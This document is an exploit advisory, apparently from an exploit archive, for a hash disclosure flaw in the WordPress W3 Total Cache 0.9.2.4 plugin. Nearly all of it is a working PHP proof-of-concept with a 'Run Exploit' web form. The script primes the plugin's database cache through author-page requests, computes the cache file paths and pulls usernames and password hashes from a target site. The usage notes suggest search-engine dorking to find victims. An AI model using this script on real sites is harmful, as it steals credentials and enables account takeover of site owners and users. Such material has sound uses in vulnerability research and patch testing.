=============================================================================================================================================
| # Title : WordPress W3 =============================================================================================================================================
| # Title : WordPress W3 Total Cache 0.9.2.4 Hash disclor vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.WordPress.org/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The code is an exploit for the W3 Total Cache plugin for WordPress, which searches for user data stored in the database cache and retrieves usernames and password hashes.

(linked: https://packetstorm.news/files/id/180672/ Linked CVE numbers: ),

[+] save code as poc.php.

[+] USage : http://127.0.0.1/poc.php

[+] PayLoad :

<?php

set_time_limit(300); // ????? ???? ?? 300 ?????

class WordpressW3TCExploit {
private $tablePrefix;
private $siteIterations;
private $userIterations;
private $targetUrl;

public function __construct($targetUrl, $tablePrefix = 'wp_', $siteIterations = 25, $userIterations = 25) {
$this->tablePrefix = $tablePrefix;
$this->siteIterations = $siteIterations;
$this->userIterations = $userIterations;
$this->targetUrl = rtrim($targetUrl, '/');
}

private function sendRequest($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function cacheUserInfo($userId) {
$url = $this->targetUrl . "/?author=" . $userId;
$this->sendRequest($url);
}

private function md5Hash($string) {
return md5($string);
}

public function run() {
$usersFound = false;
$results = "";

for ($siteId = 1; $siteId <= $this->siteIterations; $siteId++) {
$results .= "Trying site_id {$siteId}...<br>";

for ($userId = 1; $userId <= $this->userIterations; $userId++) {
$results .= "Trying user_id {$userId}...<br>";

$this->cacheUserInfo($userId);
$query = "SELECT * FROM {$this->tablePrefix}users WHERE ID = '{$userId}'";
$queryMd5 = $this->md5Hash($query);
$key = "w3tc_" . parse_url($this->targetUrl, PHP_URL_HOST) . "_{$siteId}_sql_{$queryMd5}";
$keyMd5 = $this->md5Hash($key);
$hashPath = "{$keyMd5[0]}/{$keyMd5[1]}/{$keyMd5[2]}/{$keyMd5}";
$url = "{$this->targetUrl}/wp-content/w3tc/dbcache/{$hashPath}";

$result = $this->sendRequest($url);

if (!$result) {
$results .= "No response received<br>";
continue;
}

if (preg_match('/.*"user_login";s:\d+:"([^"]*)";s:\d+:"user_pass";s:\d+:"([^"]*)".*/', $result, $matches)) {
$results .= "<strong>Found:</strong> Username: {$matches[1]} | Password Hash: {$matches[2]}<br>";
$usersFound = true;
}
}
}

if (!$usersFound) {
$results .= "<strong>No users found :(</strong><br>";
}
return $results;
}
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$target = $_POST['target_url'];
$exploit = new WordpressW3TCExploit($target);
$result = $exploit->run();
} else {
$result = "";
}
?>

<!DOCTYPE html>
<html>
<head>
<title>WordPress W3TC Exploit</title>
</head>
<body>
<h2>WordPress W3TC Exploit</h2>
<form method="POST">
<label for="target_url">Target URL:</label>
<input type="text" name="target_url" required>
<button type="submit">Run Exploit</button>
</form>
<h3>Results:</h3>
<div><?php echo $result; ?></div>
</body>
</html>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================